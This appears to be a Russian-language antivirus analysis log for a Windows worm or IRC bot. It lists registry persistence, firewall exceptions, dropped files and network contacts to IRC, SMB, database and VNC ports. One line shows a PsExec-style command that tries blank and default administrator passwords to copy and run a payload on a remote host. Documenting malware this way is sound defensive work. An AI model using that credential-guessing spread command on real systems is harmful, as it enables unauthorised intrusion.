Техническая информация (записи реестра, запускаемые файлы, сетевые соединения)
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Session Manager Subsystem' = '<LS_APPDATA>\ssms.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<LS_APPDATA>\px.exe' = '<LS_APPDATA>\px.exe:*:Enabled:px.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<LS_APPDATA>\ssms.exe' = '<LS_APPDATA>\ssms.exe:*:Enabled:ssms.exe'
- <LS_APPDATA>\px.exe \\40.149.30.158 -u Administrador -p "" -c -f -d win32x.exe \\40.149.30.158 -u Administrateur -p "" -c -f -d win32x.exe \\40.149.30.158 -u Verwalter -p "" -c -f -d win32x.exe \\40.149.30.158 -u Coordinatore -p "" -c -f -d win32x.exe \\40.149.30.158 -u "Small Business Admin" -p "" -c -f -d win32x.exe \\40.149.30.158 -u Owner -p "" -c -f -d win32x.exe \\40.149.30.158 -u %USERNAME% -p "" -c -f -d win32x.exe \\40.149.30.158 -u admin -p admin -c -f -d win32x.exe \\40.149.30.158 -u User -p "" -c -f -d win32x.exe
- <LS_APPDATA>\wn.exe hide -p ssms.exe
- <LS_APPDATA>\ssms.exe
- <LS_APPDATA>\fp.exe
- <LS_APPDATA>\MSWINSCK.OCX
- <LS_APPDATA>\msvbvm60.dll
- <LS_APPDATA>\ssms.exe
- <LS_APPDATA>\px.exe
- <LS_APPDATA>\wn.exe
- '40.##.188.98':21
- '40.##2.90.62':1433
- '40.##.37.150':3306
- 'ir#.#izon.net':6667
- '40.##9.30.158':445
- '40.##8.157.48':5900
- DNS ASK ir#.#izon.net
- ClassName: 'Shell_TrayWnd' WindowName: ''